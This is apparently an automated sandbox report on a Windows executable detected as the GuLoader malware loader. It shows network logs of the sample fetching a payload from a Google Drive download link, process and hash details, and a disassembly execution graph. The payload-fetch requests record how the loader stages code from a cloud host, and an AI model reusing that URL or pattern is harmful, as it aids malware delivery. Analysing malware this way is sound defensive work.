                                                                X-GUploader-UploadID: AFiumC4f8Wtqto45LfB1nbQ3PuH4OXaE-abP7oJC7D9S3u8kcFKteExGw4FJYR75LIFOloQjlWTqXpY
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:50 GMT
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-JZFswajyLKWTVY-3qOK1QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:51 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 31 4d 69 45 4f 6d 68 38 67 4a 6a 6d 68 63 64 49 61 47 6f 41 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="g1MiEOmh8gJjmhcdIaGoAA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.949757142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:51 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:52 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:52 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-osBM1xRgD5V_ZweOXtZriw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.949758216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:52 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:53 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTYip5M0JUxyx7NsM8LZNljfWbw4L8XjNPfjc2qzBHCBnzOX8uQWcS_ZnEfVM4aPaZCF1D8mU8
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:53 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-8roJ9Na603LJq4vYRZHJfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:53 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 42 76 65 75 55 6d 57 51 59 4d 73 44 37 78 4b 67 4c 47 6f 55 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1BveuUmWQYMsD7xKgLGoUA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:09:53:47
                                                                Start date:10/01/2025
                                                                Path:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Osb7hkGfAb.exe"
                                                                Imagebase:0x400000
                                                                File size:887'424 bytes
                                                                MD5 hash:A09950FD9AF3C4E3FF6F778AB5D8CE0F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2638880242.0000000002A86000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                General

                                                                Target ID:8
                                                                Start time:09:54:51
                                                                Start date:10/01/2025
                                                                Path:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\Osb7hkGfAb.exe"
                                                                Imagebase:0x400000
                                                                File size:887'424 bytes
                                                                MD5 hash:A09950FD9AF3C4E3FF6F778AB5D8CE0F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2637639337.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:low
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:18.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:16.2%
                                                                  Total number of Nodes:1540
                                                                  Total number of Limit Nodes:46
                                                                  execution_graph 4864 401d44 4865 402bac 17 API calls 4864->4865 4866 401d52 SetWindowLongA 4865->4866 4867 402a5a 4866->4867 3864 401ec5 3872 402bac 3864->3872 3866 401ecb 3867 402bac 17 API calls 3866->3867 3868 401ed7 3867->3868 3869 401ee3 ShowWindow 3868->3869 3870 401eee EnableWindow 3868->3870 3871 402a5a 3869->3871 3870->3871 3875 40618a 3872->3875 3874 402bc1 3874->3866 3883 406197 3875->3883 3876 4063b9 3877 4063ce 3876->3877 3908 4060f7 lstrcpynA 3876->3908 3877->3874 3879 406393 lstrlenA 3879->3883 3882 40618a 10 API calls 3882->3879 3883->3876 3883->3879 3883->3882 3885 4062af GetSystemDirectoryA 3883->3885 3886 4062c2 GetWindowsDirectoryA 3883->3886 3888 4062f6 SHGetSpecialFolderLocation 3883->3888 3889 40618a 10 API calls 3883->3889 3890 40633c lstrcatA 3883->3890 3892 405fde 3883->3892 3897 4063d2 3883->3897 3906 406055 wsprintfA 3883->3906 3907 4060f7 lstrcpynA 3883->3907 3885->3883 3886->3883 3888->3883 3891 40630e SHGetPathFromIDListA CoTaskMemFree 3888->3891 3889->3883 3890->3883 3891->3883 3909 405f7d 3892->3909 3895 406012 RegQueryValueExA RegCloseKey 3896 406041 3895->3896 3896->3883 3898 4063de 3897->3898 3900 40643b CharNextA 3898->3900 3902 406446 3898->3902 3904 406429 CharNextA 3898->3904 3905 406436 CharNextA 3898->3905 3913 405aba 3898->3913 3899 40644a CharPrevA 3899->3902 3900->3898 3900->3902 3902->3899 3903 406465 3902->3903 3903->3883 3904->3898 3905->3900 3906->3883 3907->3883 3908->3877 3910 405f8c 3909->3910 3911 405f90 3910->3911 3912 405f95 RegOpenKeyExA 3910->3912 3911->3895 3911->3896 3912->3911 3914 405ac0 3913->3914 3915 405ad3 3914->3915 3916 405ac6 CharNextA 3914->3916 3915->3898 3916->3914 3917 401746 3923 402bce 3917->3923 3921 401754 3922 405cbf 2 API calls 3921->3922 3922->3921 3924 402bda 3923->3924 3925 40618a 17 API calls 3924->3925 3926 402bfb 3925->3926 3927 40174d 3926->3927 3928 4063d2 5 API calls 3926->3928 3929 405cbf 3927->3929 3928->3927 3930 405cca GetTickCount GetTempFileNameA 3929->3930 3931 405cfb 3930->3931 3932 405cf7 3930->3932 3931->3921 3932->3930 3932->3931 4868 4045c6 4869 4045d6 4868->4869 4870 4045fc 4868->4870 4875 40417b 4869->4875 4878 4041e2 4870->4878 4873 4045e3 SetDlgItemTextA 4873->4870 4876 40618a 17 API calls 4875->4876 4877 404186 SetDlgItemTextA 4876->4877 4877->4873 4879 4042a5 4878->4879 4880 4041fa GetWindowLongA 4878->4880 4880->4879 4881 40420f 4880->4881 4881->4879 4882 40423c GetSysColor 4881->4882 4883 40423f 4881->4883 4882->4883 4884 404245 SetTextColor 4883->4884 4885 40424f SetBkMode 4883->4885 4884->4885 4886 404267 GetSysColor 4885->4886 4887 40426d 4885->4887 4886->4887 4888 404274 SetBkColor 4887->4888 4889 40427e 4887->4889 4888->4889 4889->4879 4890 404291 DeleteObject 4889->4890 4891 404298 CreateBrushIndirect 4889->4891 4890->4891 4891->4879 4892 401947 4893 402bce 17 API calls 4892->4893 4894 40194e lstrlenA 4893->4894 4895 402620 4894->4895 3933 403348 SetErrorMode GetVersion 3934 403389 3933->3934 3935 40338f 3933->3935 3936 406500 5 API calls 3934->3936 4023 406492 GetSystemDirectoryA 3935->4023 3936->3935 3938 4033a5 lstrlenA 3938->3935 3939 4033b4 3938->3939 4026 406500 GetModuleHandleA 3939->4026 3942 406500 5 API calls 3943 4033c2 3942->3943 3944 406500 5 API calls 3943->3944 3945 4033ce #17 OleInitialize SHGetFileInfoA 3944->3945 4032 4060f7 lstrcpynA 3945->4032 3948 40341a GetCommandLineA 4033 4060f7 lstrcpynA 3948->4033 3950 40342c 3951 405aba CharNextA 3950->3951 3952 403455 CharNextA 3951->3952 3961 403465 3952->3961 3953 40352f 3954 403542 GetTempPathA 3953->3954 4034 403317 3954->4034 3956 40355a 3958 4035b4 DeleteFileA 3956->3958 3959 40355e GetWindowsDirectoryA lstrcatA 3956->3959 3957 405aba CharNextA 3957->3961 4044 402ea1 GetTickCount GetModuleFileNameA 3958->4044 3962 403317 12 API calls 3959->3962 3961->3953 3961->3957 3964 403531 3961->3964 3963 40357a 3962->3963 3963->3958 3968 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3963->3968 4129 4060f7 lstrcpynA 3964->4129 3965 40365e 4146 403830 3965->4146 3966 4035c8 3966->3965 3969 40364e 3966->3969 3973 405aba CharNextA 3966->3973 3971 403317 12 API calls 3968->3971 4072 40390a 3969->4072 3975 4035ac 3971->3975 3976 4035e3 3973->3976 3975->3958 3975->3965 3983 403629 3976->3983 3984 40368e 3976->3984 3977 403796 3980 403818 ExitProcess 3977->3980 3981 40379e GetCurrentProcess OpenProcessToken 3977->3981 3978 403678 4153 405813 3978->4153 3986 4037e9 3981->3986 3987 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 3981->3987 4130 405b7d 3983->4130 4157 40577e 3984->4157 3988 406500 5 API calls 3986->3988 3987->3986 3991 4037f0 3988->3991 3994 403805 ExitWindowsEx 3991->3994 3998 403811 3991->3998 3994->3980 3994->3998 3995 4036a4 lstrcatA 3996 4036af lstrcatA lstrcmpiA 3995->3996 3996->3965 3997 4036cb 3996->3997 4001 4036d0 3997->4001 4002 4036d7 3997->4002 4177 40140b 3998->4177 4000 403643 4145 4060f7 lstrcpynA 4000->4145 4160 4056e4 CreateDirectoryA 4001->4160 4165 405761 CreateDirectoryA 4002->4165 4008 4036dc SetCurrentDirectoryA 4009 4036f6 4008->4009 4010 4036eb 4008->4010 4169 4060f7 lstrcpynA 4009->4169 4168 4060f7 lstrcpynA 4010->4168 4013 40618a 17 API calls 4014 403735 DeleteFileA 4013->4014 4015 403742 CopyFileA 4014->4015 4020 403704 4014->4020 4015->4020 4016 40378a 4018 405ed6 36 API calls 4016->4018 4018->3965 4019 40618a 17 API calls 4019->4020 4020->4013 4020->4016 4020->4019 4022 403776 CloseHandle 4020->4022 4170 405ed6 MoveFileExA 4020->4170 4174 405796 CreateProcessA 4020->4174 4022->4020 4024 4064b4 wsprintfA LoadLibraryExA 4023->4024 4024->3938 4027 406526 GetProcAddress 4026->4027 4028 40651c 4026->4028 4030 4033bb 4027->4030 4029 406492 3 API calls 4028->4029 4031 406522 4029->4031 4030->3942 4031->4027 4031->4030 4032->3948 4033->3950 4035 4063d2 5 API calls 4034->4035 4037 403323 4035->4037 4036 40332d 4036->3956 4037->4036 4180 405a8f lstrlenA CharPrevA 4037->4180 4040 405761 2 API calls 4041 40333b 4040->4041 4042 405cbf 2 API calls 4041->4042 4043 403346 4042->4043 4043->3956 4183 405c90 GetFileAttributesA CreateFileA 4044->4183 4046 402ee1 4064 402ef1 4046->4064 4184 4060f7 lstrcpynA 4046->4184 4048 402f07 4185 405ad6 lstrlenA 4048->4185 4052 402f18 GetFileSize 4053 403012 4052->4053 4071 402f2f 4052->4071 4190 402e3d 4053->4190 4055 40301b 4057 40304b GlobalAlloc 4055->4057 4055->4064 4225 403300 SetFilePointer 4055->4225 4201 403300 SetFilePointer 4057->4201 4059 40307e 4063 402e3d 6 API calls 4059->4063 4061 403034 4065 4032ea ReadFile 4061->4065 4062 403066 4202 4030d8 4062->4202 4063->4064 4064->3966 4067 40303f 4065->4067 4067->4057 4067->4064 4068 402e3d 6 API calls 4068->4071 4069 403072 4069->4064 4069->4069 4070 4030af SetFilePointer 4069->4070 4070->4064 4071->4053 4071->4059 4071->4064 4071->4068 4222 4032ea 4071->4222 4073 406500 5 API calls 4072->4073 4074 40391e 4073->4074 4075 403924 4074->4075 4076 403936 4074->4076 4254 406055 wsprintfA 4075->4254 4077 405fde 3 API calls 4076->4077 4078 403961 4077->4078 4080 40397f lstrcatA 4078->4080 4082 405fde 3 API calls 4078->4082 4081 403934 4080->4081 4246 403bcf 4081->4246 4082->4080 4085 405b7d 18 API calls 4086 4039b1 4085->4086 4087 403a3a 4086->4087 4089 405fde 3 API calls 4086->4089 4088 405b7d 18 API calls 4087->4088 4090 403a40 4088->4090 4091 4039dd 4089->4091 4092 403a50 LoadImageA 4090->4092 4093 40618a 17 API calls 4090->4093 4091->4087 4096 4039f9 lstrlenA 4091->4096 4100 405aba CharNextA 4091->4100 4094 403af6 4092->4094 4095 403a77 RegisterClassA 4092->4095 4093->4092 4099 40140b 2 API calls 4094->4099 4097 403b00 4095->4097 4098 403aad SystemParametersInfoA CreateWindowExA 4095->4098 4101 403a07 lstrcmpiA 4096->4101 4102 403a2d 4096->4102 4097->3965 4098->4094 4103 403afc 4099->4103 4105 4039f7 4100->4105 4101->4102 4106 403a17 GetFileAttributesA 4101->4106 4104 405a8f 3 API calls 4102->4104 4103->4097 4107 403bcf 18 API calls 4103->4107 4108 403a33 4104->4108 4105->4096 4109 403a23 4106->4109 4110 403b0d 4107->4110 4255 4060f7 lstrcpynA 4108->4255 4109->4102 4112 405ad6 2 API calls 4109->4112 4113 403b19 ShowWindow 4110->4113 4114 403b9c 4110->4114 4112->4102 4116 406492 3 API calls 4113->4116 4256 4052f0 OleInitialize 4114->4256 4118 403b31 4116->4118 4117 403ba2 4119 403bbe 4117->4119 4121 403ba6 4117->4121 4120 403b3f GetClassInfoA 4118->4120 4123 406492 3 API calls 4118->4123 4122 40140b 2 API calls 4119->4122 4124 403b53 GetClassInfoA RegisterClassA 4120->4124 4125 403b69 DialogBoxParamA 4120->4125 4121->4097 4126 40140b 2 API calls 4121->4126 4122->4097 4123->4120 4124->4125 4127 40140b 2 API calls 4125->4127 4126->4097 4128 403b91 4127->4128 4128->4097 4129->3954 4274 4060f7 lstrcpynA 4130->4274 4132 405b8e 4275 405b28 CharNextA CharNextA 4132->4275 4135 403634 4135->3965 4144 4060f7 lstrcpynA 4135->4144 4136 4063d2 5 API calls 4142 405ba4 4136->4142 4137 405bcf lstrlenA 4138 405bda 4137->4138 4137->4142 4140 405a8f 3 API calls 4138->4140 4141 405bdf GetFileAttributesA 4140->4141 4141->4135 4142->4135 4142->4137 4143 405ad6 2 API calls 4142->4143 4281 40646b FindFirstFileA 4142->4281 4143->4137 4144->4000 4145->3969 4147 403848 4146->4147 4148 40383a CloseHandle 4146->4148 4284 403875 4147->4284 4148->4147 4155 405828 4153->4155 4154 403686 ExitProcess 4155->4154 4156 40583c MessageBoxIndirectA 4155->4156 4156->4154 4158 406500 5 API calls 4157->4158 4159 403693 lstrcatA 4158->4159 4159->3995 4159->3996 4161 4036d5 4160->4161 4162 405735 GetLastError 4160->4162 4161->4008 4162->4161 4163 405744 SetFileSecurityA 4162->4163 4163->4161 4164 40575a GetLastError 4163->4164 4164->4161 4166 405771 4165->4166 4167 405775 GetLastError 4165->4167 4166->4008 4167->4166 4168->4009 4169->4020 4171 405eea 4170->4171 4173 405ef7 4170->4173 4341 405d66 4171->4341 4173->4020 4175 4057d5 4174->4175 4176 4057c9 CloseHandle 4174->4176 4175->4020 4176->4175 4178 401389 2 API calls 4177->4178 4179 401420 4178->4179 4179->3980 4181 403335 4180->4181 4182 405aa9 lstrcatA 4180->4182 4181->4040 4182->4181 4183->4046 4184->4048 4186 405ae3 4185->4186 4187 402f0d 4186->4187 4188 405ae8 CharPrevA 4186->4188 4189 4060f7 lstrcpynA 4187->4189 4188->4186 4188->4187 4189->4052 4191 402e46 4190->4191 4192 402e5e 4190->4192 4193 402e56 4191->4193 4194 402e4f DestroyWindow 4191->4194 4195 402e66 4192->4195 4196 402e6e GetTickCount 4192->4196 4193->4055 4194->4193 4226 40653c 4195->4226 4198 402e7c CreateDialogParamA ShowWindow 4196->4198 4199 402e9f 4196->4199 4198->4199 4199->4055 4201->4062 4203 4030ee 4202->4203 4204 40311c 4203->4204 4232 403300 SetFilePointer 4203->4232 4206 4032ea ReadFile 4204->4206 4207 403127 4206->4207 4208 403283 4207->4208 4209 403139 GetTickCount 4207->4209 4211 40326d 4207->4211 4210 4032c5 4208->4210 4215 403287 4208->4215 4209->4211 4218 403188 4209->4218 4212 4032ea ReadFile 4210->4212 4211->4069 4212->4211 4213 4032ea ReadFile 4213->4218 4214 4032ea ReadFile 4214->4215 4215->4211 4215->4214 4216 405d37 WriteFile 4215->4216 4216->4215 4217 4031de GetTickCount 4217->4218 4218->4211 4218->4213 4218->4217 4219 403203 MulDiv wsprintfA 4218->4219 4230 405d37 WriteFile 4218->4230 4233 40521e 4219->4233 4244 405d08 ReadFile 4222->4244 4225->4061 4227 406559 PeekMessageA 4226->4227 4228 402e6c 4227->4228 4229 40654f DispatchMessageA 4227->4229 4228->4055 4229->4227 4231 405d55 4230->4231 4231->4218 4232->4204 4234 405239 4233->4234 4243 4052dc 4233->4243 4235 405256 lstrlenA 4234->4235 4236 40618a 17 API calls 4234->4236 4237 405264 lstrlenA 4235->4237 4238 40527f 4235->4238 4236->4235 4239 405276 lstrcatA 4237->4239 4237->4243 4240 405292 4238->4240 4241 405285 SetWindowTextA 4238->4241 4239->4238 4242 405298 SendMessageA SendMessageA SendMessageA 4240->4242 4240->4243 4241->4240 4242->4243 4243->4218 4245 4032fd 4244->4245 4245->4071 4247 403be3 4246->4247 4263 406055 wsprintfA 4247->4263 4249 403c54 4264 403c88 4249->4264 4251 40398f 4251->4085 4252 403c59 4252->4251 4253 40618a 17 API calls 4252->4253 4253->4252 4254->4081 4255->4087 4267 4041c7 4256->4267 4258 405313 4262 40533a 4258->4262 4270 401389 4258->4270 4259 4041c7 SendMessageA 4260 40534c OleUninitialize 4259->4260 4260->4117 4262->4259 4263->4249 4265 40618a 17 API calls 4264->4265 4266 403c96 SetWindowTextA 4265->4266 4266->4252 4268 4041d0 SendMessageA 4267->4268 4269 4041df 4267->4269 4268->4269 4269->4258 4272 401390 4270->4272 4271 4013fe 4271->4258 4272->4271 4273 4013cb MulDiv SendMessageA 4272->4273 4273->4272 4274->4132 4276 405b53 4275->4276 4277 405b43 4275->4277 4279 405aba CharNextA 4276->4279 4280 405b73 4276->4280 4277->4276 4278 405b4e CharNextA 4277->4278 4278->4280 4279->4276 4280->4135 4280->4136 4282 406481 FindClose 4281->4282 4283 40648c 4281->4283 4282->4283 4283->4142 4285 403883 4284->4285 4286 40384d 4285->4286 4287 403888 FreeLibrary GlobalFree 4285->4287 4288 4058bf 4286->4288 4287->4286 4287->4287 4289 405b7d 18 API calls 4288->4289 4290 4058df 4289->4290 4291 4058e7 DeleteFileA 4290->4291 4292 4058fe 4290->4292 4296 403667 OleUninitialize 4291->4296 4293 405a2c 4292->4293 4328 4060f7 lstrcpynA 4292->4328 4293->4296 4301 40646b 2 API calls 4293->4301 4295 405924 4297 405937 4295->4297 4298 40592a lstrcatA 4295->4298 4296->3977 4296->3978 4300 405ad6 2 API calls 4297->4300 4299 40593d 4298->4299 4302 40594b lstrcatA 4299->4302 4304 405956 lstrlenA FindFirstFileA 4299->4304 4300->4299 4303 405a50 4301->4303 4302->4304 4303->4296 4305 405a54 4303->4305 4304->4293 4311 40597a 4304->4311 4306 405a8f 3 API calls 4305->4306 4308 405a5a 4306->4308 4307 405aba CharNextA 4307->4311 4309 405877 5 API calls 4308->4309 4310 405a66 4309->4310 4312 405a80 4310->4312 4313 405a6a 4310->4313 4311->4307 4316 405a0b FindNextFileA 4311->4316 4325 4059cc 4311->4325 4329 4060f7 lstrcpynA 4311->4329 4315 40521e 24 API calls 4312->4315 4313->4296 4317 40521e 24 API calls 4313->4317 4315->4296 4316->4311 4318 405a23 FindClose 4316->4318 4319 405a77 4317->4319 4318->4293 4320 405ed6 36 API calls 4319->4320 4323 405a7e 4320->4323 4322 4058bf 60 API calls 4322->4325 4323->4296 4324 40521e 24 API calls 4324->4316 4325->4316 4325->4322 4325->4324 4326 40521e 24 API calls 4325->4326 4327 405ed6 36 API calls 4325->4327 4330 405877 4325->4330 4326->4325 4327->4325 4328->4295 4329->4311 4338 405c6b GetFileAttributesA 4330->4338 4333 4058a4 4333->4325 4334 405892 RemoveDirectoryA 4336 4058a0 4334->4336 4335 40589a DeleteFileA 4335->4336 4336->4333 4337 4058b0 SetFileAttributesA 4336->4337 4337->4333 4339 405883 4338->4339 4340 405c7d SetFileAttributesA 4338->4340 4339->4333 4339->4334 4339->4335 4340->4339 4342 405db2 GetShortPathNameA 4341->4342 